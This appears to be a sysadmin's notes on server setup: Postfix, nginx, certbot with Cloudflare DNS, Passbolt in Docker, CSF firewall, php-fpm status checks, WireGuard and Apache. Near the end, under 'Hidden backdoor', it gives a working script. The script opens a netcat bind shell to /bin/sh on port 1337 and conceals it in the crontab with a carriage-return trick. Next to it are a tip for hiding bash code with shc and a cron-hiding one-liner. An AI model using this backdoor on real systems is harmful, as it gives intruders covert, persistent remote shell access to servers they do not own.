Should not be a full path:
vi /etc/postfix/main.cf
smtpd_sasl_path = private/auth-client
Should not be a full path:
vi /etc/postfix/main.cf
smtpd_sasl_path = private/auth-client
vim /etc/nginx/nginx.conf
client_max_body_size 100m;
client_body_timeout 120s;
apt update
apt install snapd
snap install core; snap refresh core
apt-get remove certbot
snap install --classic certbot
ln -s /snap/bin/certbot /usr/bin/certbot
snap set certbot trust-plugin-with-root=ok
snap install --beta certbot-dns-cloudflare
snap connect certbot:plugin certbot-dns-cloudflare
vim ~/.secrets/certbot/cloudflare.ini
dns_cloudflare_api_token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
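# Issue a certificate for the apex domain and a wildcard via the Cloudflare
# DNS-01 plugin. The wildcard is quoted so the shell cannot expand it as a glob
# against files in the current directory before certbot sees it. certbot warns
# when the credentials file is group/world readable; keep it mode 0600.
certbot certonly \
  --dns-cloudflare \
  --dns-cloudflare-credentials ~/.secrets/certbot/cloudflare.ini \
  -d srv24x7.com \
  -d '*.srv24x7.com'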
docker pull passbolt/passbolt:latest
git clone https://github.com/passbolt/passbolt_docker
cd passbolt_docker
vim env/mysql.env
vim env/passbolt.env
docker-compose -f docker-compose.yml up -d
docker-compose ps
docker-compose exec passbolt su -m -c "/var/www/passbolt/bin/cake \ passbolt register_user \ -u <[email protected]> \ -f <yourname> \ -l <surname> \ -r admin" -s /bin/sh www-data
Another option is to run passbolt manually:
docker network create passbolt_network
docker volume create mariadb_passbolt_data
docker run -d --name mariadb --net passbolt_network \ --mount source=mariadb_passbolt_data,target=/var/lib/mysql \ -e MYSQL_ROOT_PASSWORD=<root_password> \ -e MYSQL_DATABASE=<mariadb_database> \ -e MYSQL_USER=<mariadb_user> \ -e MYSQL_PASSWORD=<mariadb_password> \ mariadb
docker run --name passbolt --net passbolt_network \ --mount type=bind,\ source=<host_path_to_gnupg_keys_dir>,\ target=/var/www/passbolt/config/gpg \ -p 443:443 \ -p 80:80 \ -e DATASOURCES_DEFAULT_HOST=mariadb \ -e DATASOURCES_DEFAULT_PASSWORD=<mariadb_password> \ -e DATASOURCES_DEFAULT_USERNAME=<mariadb_user> \ -e DATASOURCES_DEFAULT_DATABASE=<mariadb_database> \ -e APP_FULL_BASE_URL=https://mydomain.com \ passbolt/passbolt:latest
Data to persist in the passbolt container:
/var/www/passbolt/webroot/img
/var/www/passbolt/config/gpg
/etc/ssl/certs/certificate.crt /etc/ssl/certs/certificate.key
One way to persist the images directory is to create a docker volume:
docker volume create passbolt_images
docker run --name passbolt --net passbolt_network \ --mount source=passbolt_images,\ target=/var/www/passbolt/webroot/img \ -p 443:443 \ -p 80:80 \ -e DATASOURCES_DEFAULT_HOST=mariadb \ -e DATASOURCES_DEFAULT_PASSWORD=<mariadb_password> \ -e DATASOURCES_DEFAULT_USERNAME=<mariadb_user> \ -e DATASOURCES_DEFAULT_DATABASE=<mariadb_database> \ -e APP_FULL_BASE_URL=https://mydomain.com \ passbolt/passbolt:latest
certbot renew --cert-name srv24x7.com
certbot renew --force-renewal --cert-name srv24x7.com
vi /etc/security/limits.conf
* - nofile 524288
vi /etc/csf/csf.allow
192.168.100.100
vi /etc/csf/csf.conf
In the TCP_IN setting, remove your SSH port
or
vi /etc/csf/csf.conf
tcp|in|d=22|s=192.168.100.100
csf -ra
/usr/libexec/httpd-ssl-gencerts
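# Strip comment lines (leading ';') and blank lines from the php-fpm pool
# config, in place. The result is staged in a temp file first: in the original
# one-liner `tee` truncates the target while `cat` is still reading it, which
# can leave the config empty. `grep -v \;` (unquoted) also dropped any line
# merely containing a ';'; only whole-line comments are removed here. The temp
# file is copied over the target rather than moved so the file's ownership and
# mode are preserved for php-fpm.
conf=/etc/php/7.4/fpm/pool.d/www.conf
tmp=$(mktemp) || exit 1
grep -v '^[[:space:]]*;' -- "$conf" | awk 'NF' > "$tmp" && cat -- "$tmp" > "$conf"
rm -f -- "$tmp"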
vi /etc/php/7.4/fpm/pool.d/www.conf
pm.status_path=/status
ping.path=/ping
ping.response=pong
apt install fcgiwrap
ss -l | grep php
u_str LISTEN 0 511 /run/php/php7.4-fpm.sock 79744 * 0
SCRIPT_NAME=/status \
SCRIPT_FILENAME=/status \
REQUEST_METHOD=GET \
cgi-fcgi -bind -connect /run/php/php7.4-fpm.sock
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Content-type: text/plain;charset=UTF-8
pool: www
process manager: dynamic
start time: 07/Feb/2021:13:44:50 +0200
start since: 382
accepted conn: 3
listen queue: 0
max listen queue: 0
listen queue len: 0
idle processes: 1
active processes: 1
total processes: 2
max active processes: 1
max children reached: 0
slow requests: 0
add-apt-repository ppa:wireguard/wireguard
apt-get update
apt install wireguard
MacOS
brew install wireguard-tools
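# Generate a WireGuard keypair. The umask is set in a subshell so `tee` creates
# the privatekey file readable only by its owner (the interactive shell's umask
# is left untouched); with the default umask the private key would be
# world-readable.
(umask 077 && wg genkey | tee privatekey | wg pubkey > publickey)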
Server side:
/etc/wireguard/wg0.conf
[Interface]
Address = 10.0.0.1/24
DNS = 1.1.1.1
PrivateKey = [ServerPrivateKey]
ListenPort = 51820
PostUp = iptables -A FORWARD -i %i -j ACCEPT; iptables -A FORWARD -o %i -j ACCEPT; iptables -t nat -A POSTROUTING -o enp9s0 -j MASQUERADE
PostDown = iptables -D FORWARD -i %i -j ACCEPT; iptables -D FORWARD -o %i -j ACCEPT; iptables -t nat -D POSTROUTING -o enp9s0 -j MASQUERADE
[Peer]
#Peer #1
PublicKey = [Peer#1PublicKey]
AllowedIPs = 10.0.0.3/32
[Peer]
#Peer #2
PublicKey = [Peer#2PublicKey]
AllowedIPs = 10.0.0.10/32
[Peer]
#Peer #3
PublicKey = [Peer#3PublicKey]
AllowedIPs = 10.0.0.2/32
[Peer]
#Peer #4
PublicKey = [Peer#4PublicKey]
AllowedIPs = 10.0.0.11/32
Client side:
/etc/wireguard/wg0.conf
[Interface]
Address = 10.0.0.3/24
PrivateKey = [PrivateKeyPeer#1]
[Peer]
PublicKey = [ServerPublicKey]
Endpoint = some.domain.com:51820
AllowedIPs = 0.0.0.0/0
# This is for if you're behind a NAT and
# want the connection to be kept alive.
PersistentKeepalive = 25
Start/stop interface
wg-quick up wg0
wg-quick down wg0
Start/stop service
$ sudo systemctl stop [email protected]
$ sudo systemctl start [email protected]
Instead of having to modify the file for every client you want to add to the
server you could also use the wg tool instead:
# add peer
wg set wg0 peer
# verify connection
wg
# save to config
wg-quick save wg0
apt install apache2 php7.4-fpm
a2enconf php7.4-fpm
a2enmod proxy proxy_fcgi
cat /etc/apache2/conf-enabled/php7.4-fpm.conf
# Redirect to local php-fpm if mod_php is not available
<IfModule !mod_php7.c>
    <IfModule proxy_fcgi_module>
        # Enable http authorization headers
        <IfModule setenvif_module>
        SetEnvIfNoCase ^Authorization$ "(.+)" HTTP_AUTHORIZATION=$1
        </IfModule>

        <FilesMatch ".+\.ph(ar|p|tml)$">
            SetHandler "proxy:unix:/run/php/php7.4-fpm.sock|fcgi://localhost"
        </FilesMatch>
        <FilesMatch ".+\.phps$">
            # Deny access to raw php sources by default
            # To re-enable it's recommended to enable access to the files
            # only in specific virtual host or directory
            Require all denied
        </FilesMatch>
        # Deny access to files without filename (e.g. '.php')
        <FilesMatch "^\.ph(ar|p|ps|tml)$">
            Require all denied
        </FilesMatch>
    </IfModule>
</IfModule>
File not found.
This error message means there is no such file.
Hide bash code by compiling it with shc (C):
apt install shc
shc -f mybash.sh
printf "* * * * * >/tmp/x;\rno crontab for $USER\n" | crontab -
crontab -l
no crontab for vit
Hidden backdoor:
# Port the listener below binds to (used in BDOOR_SH via ${BDOOR_PT}).
BDOOR_PT=1337
# Bind-shell command: two FIFOs in /tmp connect a netcat listener on
# BDOOR_PT to /bin/sh; both FIFOs are removed when the shell exits.
BDOOR_SH="{ \
cd /tmp; mkfifo .i .o; \
cat .o | nc -l -p ${BDOOR_PT} > .i & \
/bin/sh < .i &>.o ; rm -f .i .o; \
}"
# scheduled task that will be hidden
# Every-minute cron entry with stdout/stderr discarded.
HIDDEN="* * * * * ${BDOOR_SH}>/dev/null 2>&1"
# Display the current cron table and modify the first line
# Detection note (review): the "\r" written by the printf below makes a
# terminal rewind to column 0 and print FIRST_TASK over the hidden entry, so
# plain "crontab -l" looks unchanged. "crontab -l | cat -v" exposes the
# carriage return as ^M, and the listener itself shows up in "ss -ltnp".
crontab -l 2>&1 | {
read FIRST_TASK;
# Pad the existing first line with spaces so, once rewound, it is long
# enough to cover the whole hidden entry on screen.
if [ ${#HIDDEN} -gt ${#FIRST_TASK} ]; then
# end the first crontab line with spaces to hide our backdoor and
# one more character (";").
while (( i < (${#HIDDEN} - ${#SHOWN_TASK} + 1) )); do
FIRST_TASK="${FIRST_TASK} "; ((i++))
done
fi
# carriage return goes there ("\r")
# The remaining crontab lines are passed through unchanged by `cat`.
printf "${HIDDEN};\r${FIRST_TASK}\n"; cat
} | crontab -
# $? here is the status of `crontab -` (last stage of the pipeline).
if [ $? -eq 0 ]; then
echo "Backdoor is now hidden in cron table"
echo "Shell will be bind on port ${BDOOR_PT}."
else
echo "Failed."
fi
vi /etc/nginx/nginx.conf
log_format timed_combined '$remote_addr - $remote_user [$time_local] '
'"$request" $status $body_bytes_sent '
'"$http_referer" "$http_user_agent" '
'$request_time $upstream_response_time $pipe';
access_log /var/log/nginx/srv24x7.com.access.log timed_combined;